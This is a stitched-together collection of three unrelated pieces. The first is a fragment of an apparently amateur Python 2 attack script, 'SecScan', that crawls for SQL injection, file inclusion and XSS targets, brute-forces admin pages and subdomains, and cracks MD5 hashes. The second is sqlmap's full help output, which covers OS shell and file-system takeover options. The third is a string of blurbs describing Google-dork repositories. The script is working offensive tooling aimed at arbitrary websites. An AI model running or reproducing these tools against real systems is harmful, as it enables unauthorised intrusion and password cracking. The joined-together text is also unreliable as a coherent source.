'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print O+'Found: ' + G+site + W class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found' + W print '>> ' + str(invuln) + G+' Sites Not Vulnerable' + W print '>> ' + str(np) + R+' Sites Without Parameters' + W if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; def main(): """Outputs Menu and gets input""" quotes = [ '\nm0le@tormail.org\n' ] print (O+''' ------------- -- SecScan -- --- v1.5 ---- ---- by ----- --- m0le ---- -------------''') print (G+''' -[1]- SQLi -[2]- LFI -[3]- XSS -[4]- RFI -[5]- Proxy -[6]- Admin Page Finder -[7]- Sub Domain Scan -[8]- Dictionary MD5 cracker -[9]- Online MD5 cracker -[10]- Check your IP address''') print (B+''' -[!]- If freeze while running or want to quit, just Ctrl C, it will automatically terminate the job. ''') print W global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print choice(quotes) elif option == '2': Crawl() output() print choice(quotes) elif option == '3': Crawl() output() print choice(quotes) elif option == '4': Crawl() output() print choice(quotes) elif option == '5': Ip() print choice(quotes) elif option == '6': admin() aprint() print choice(quotes) elif option == '7': subd() print choice(quotes) elif option == '8': word() print choice(quotes) elif option == '9': OnlineCrack().crack() print choice(quotes) elif option == '10': Check().grab() print choice(quotes) else: print R+'\nInvalid Choice\n' + W time.sleep(0.9) main() else: print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W time.sleep(0.9) main() if __name__ == '__main__': main()

Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -d DIRECT Connection string for direct database connection -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -l LOGFILE Parse target(s) from Burp or WebScarab proxy log file -x SITEMAPURL Parse target(s) from remote sitemap(.xml) file -m BULKFILE Scan multiple targets given in a textual file -r REQUESTFILE Load HTTP request from a file -g GOOGLEDORK Process Google dork results as target URLs -c CONFIGFILE Load options from a configuration INI file Request: These options can be used to specify how to connect to the target URL --method=METHOD Force usage of given HTTP method (e.g. PUT) --data=DATA Data string to be sent through POST --param-del=PARA.. Character used for splitting parameter values --cookie=COOKIE HTTP Cookie header value --cookie-del=COO.. Character used for splitting cookie values --load-cookies=L.. File containing cookies in Netscape/wget format --drop-set-cookie Ignore Set-Cookie header from response --user-agent=AGENT HTTP User-Agent header value --random-agent Use randomly selected HTTP User-Agent header value --host=HOST HTTP Host header value --referer=REFERER HTTP Referer header value -H HEADER, --hea.. Extra header (e.g. "X-Forwarded-For: 127.0.0.1") --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123") --auth-type=AUTH.. HTTP authentication type (Basic, Digest, NTLM or PKI) --auth-cred=AUTH.. HTTP authentication credentials (name:password) --auth-file=AUTH.. HTTP authentication PEM cert/private key file --ignore-401 Ignore HTTP Error 401 (Unauthorized) --proxy=PROXY Use a proxy to connect to the target URL --proxy-cred=PRO.. Proxy authentication credentials (name:password) --proxy-file=PRO.. Load proxy list from a file --ignore-proxy Ignore system default proxy settings --tor Use Tor anonymity network --tor-port=TORPORT Set Tor proxy port other than default --tor-type=TORTYPE Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5) --check-tor Check to see if Tor is used properly --delay=DELAY Delay in seconds between each HTTP request --timeout=TIMEOUT Seconds to wait before timeout connection (default 30) --retries=RETRIES Retries when the connection timeouts (default 3) --randomize=RPARAM Randomly change value for given parameter(s) --safe-url=SAFEURL URL address to visit frequently during testing --safe-post=SAFE.. POST data to send to a safe URL --safe-req=SAFER.. Load safe HTTP request from a file --safe-freq=SAFE.. Test requests between two visits to a given safe URL --skip-urlencode Skip URL encoding of payload data --csrf-token=CSR.. Parameter used to hold anti-CSRF token --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token --force-ssl Force usage of SSL/HTTPS --hpp Use HTTP parameter pollution method --eval=EVALCODE Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()") Optimization: These options can be used to optimize the performance of sqlmap -o Turn on all optimization switches --predict-output Predict common queries output --keep-alive Use persistent HTTP(s) connections --null-connection Retrieve page length without actual HTTP response body --threads=THREADS Max number of concurrent HTTP(s) requests (default 1) Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --skip=SKIP Skip testing for given parameter(s) --skip-static Skip testing parameters that not appear dynamic --dbms=DBMS Force back-end DBMS to this value --dbms-cred=DBMS.. DBMS authentication credentials (user:password) --os=OS Force back-end DBMS operating system to this value --invalid-bignum Use big numbers for invalidating values --invalid-logical Use logical operations for invalidating values --invalid-string Use random strings for invalidating values --no-cast Turn off payload casting mechanism --no-escape Turn off string escaping mechanism --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string --tamper=TAMPER Use given script(s) for tampering injection data Detection: These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (1-3, default 1) --string=STRING String to match when query is evaluated to True --not-string=NOT.. String to match when query is evaluated to False --regexp=REGEXP Regexp to match when query is evaluated to True --code=CODE HTTP code to match when query is evaluated to True --text-only Compare pages based only on the textual content --titles Compare pages based only on their titles Techniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH SQL injection techniques to use (default "BEUSTQ") --time-sec=TIMESEC Seconds to delay the DBMS response (default 5) --union-cols=UCOLS Range of columns to test for UNION query SQL injection --union-char=UCHAR Character to use for bruteforcing number of columns --union-from=UFROM Table to use in FROM part of UNION query SQL injection --dns-domain=DNS.. Domain name used for DNS exfiltration attack --second-order=S.. Resulting page URL searched for second-order response Fingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements -a, --all Retrieve everything -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes --privileges Enumerate DBMS users privileges --roles Enumerate DBMS users roles --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries --search Search column(s), table(s) and/or database name(s) --comments Retrieve DBMS comments -D DB DBMS database to enumerate -T TBL DBMS database table(s) to enumerate -C COL DBMS database table column(s) to enumerate -X EXCLUDECOL DBMS database table column(s) to not enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --pivot-column=P.. Pivot column name --where=DUMPWHERE Use WHERE condition while table dumping --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --first=FIRSTCHAR First query output word character to retrieve --last=LASTCHAR Last query output word character to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell --sql-file=SQLFILE Execute SQL statements from given file(s) Brute force: These options can be used to run brute force checks --common-tables Check existence of common tables --common-columns Check existence of common columns User-defined function injection: These options can be used to create custom user-defined functions --udf-inject Inject custom user-defined functions --shared-lib=SHLIB Local path of the shared library File system access: These options can be used to access the back-end database management system underlying file system --file-read=RFILE Read a file from the back-end DBMS file system --file-write=WFILE Write a local file on the back-end DBMS file system --file-dest=DFILE Back-end DBMS absolute filepath to write to Operating system access: These options can be used to access the back-end database management system underlying operating system --os-cmd=OSCMD Execute an operating system command --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation --priv-esc Database process user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework is installed --tmp-path=TMPPATH Remote absolute path of temporary files directory Windows registry access: These options can be used to access the back-end database management system Windows registry --reg-read Read a Windows registry key value --reg-add Write a Windows registry key value data --reg-del Delete a Windows registry key value --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key value --reg-data=REGDATA Windows registry key value data --reg-type=REGTYPE Windows registry key value type General: These options can be used to set some general working parameters -s SESSIONFILE Load session from a stored (.sqlite) file -t TRAFFICFILE Log all HTTP traffic into a textual file --batch Never ask for user input, use the default behaviour --binary-fields=.. Result fields having binary values (e.g. "digest") --charset=CHARSET Force character encoding used for data retrieval --crawl=CRAWLDEPTH Crawl the website starting from the target URL --crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout") --csv-del=CSVDEL Delimiting character used in CSV output (default ",") --dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE) --eta Display for each output the estimated time of arrival --flush-session Flush session files for current target --forms Parse and test forms on target URL --fresh-queries Ignore query results stored in session file --hex Use DBMS hex function(s) for data retrieval --output-dir=OUT.. Custom output directory path --parse-errors Parse and display DBMS error messages from responses --save=SAVECONFIG Save options to a configuration INI file --scope=SCOPE Regexp to filter targets from provided proxy log --test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW) --test-skip=TEST.. Skip tests by payloads and/or titles (e.g. BENCHMARK) --update Update sqlmap Miscellaneous: -z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU") --alert=ALERT Run host OS command(s) when SQL injection is found --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N") --beep Beep on question and/or when SQL injection is found --cleanup Clean up the DBMS from sqlmap specific UDF and tables --dependencies Check for missing (non-core) sqlmap dependencies --disable-coloring Disable console output coloring --gpage=GOOGLEPAGE Use Google dork results from specified page number --identify-waf Make a thorough testing for a WAF/IPS/IDS protection --skip-waf Skip heuristic detection of WAF/IPS/IDS protection --mobile Imitate smartphone through HTTP User-Agent header --offline Work in offline mode (only use session data) --page-rank Display page rank (PR) for Google dork results --purge-output Safely remove all content from output directory --smart Conduct thorough tests only if positive heuristic(s) --sqlmap-shell Prompt for an interactive sqlmap shell --wizard Simple wizard interface for beginner users

A comprehensive list of Google Dorking commands to help with advanced search queries, penetration testing, and cybersecurity research. Discover sensitive information, exposed directories, and misconfigured systems using Google's search engine. Perfect for ethical hackers, developers, and researchers.

Google dorks for SQL injection, Local File Inclusion, open CCTV cams and sensitive information.

small and simple tool for generating a list and searching for Google Dork to identify leaked files and save the scan result

List of Google dorks for common web shells.

Python script to run through a list of common Google dorks.

Here's an updated Google Dorking list for 2025 Bug Bounty Hunting, incorporating new patterns and, the latest trends.

Search Engine For Web Pen-testing and Bug Hunting - A simple tool that provides an updated list of Google dorks for finding vulnerable endpoints, exposed databases, and sensitive information indexed by search engines.

🧾 | Google Dorks for automation and manual search a list containing my most used dorks in bug bounty and pentesting!

A list of validated Google dork operators updated on October 2025.

A List of Google Dorks That Help you find Vulnerable Websites Indexed in Google Search Results

DorkSearch is a sleek web tool for bug bounty hunters and security pros. It uses advanced Google Dorking techniques to find exposed URLs, sensitive documents, and vulnerabilities. Features include directory listings, config files, SQL errors, subdomains, and integration with GitHub, Shodan, and Censys.

Python script that perform Google Dorking with HTTP/HTTPS Proxy List.

OSINT to Websites -->WhatWeb, Whois, Advanced Port Scanner, Server Information, Attempt to Extract Real Server IP with CloudFlare, SSL Encryption, List All URLs of a Domain, WordPress Web Information, Extract Workers, Emails and Phone Numbers, List Domains, Google Dorks, Ping a Website

Basic List of Google Dorks [Incomplete]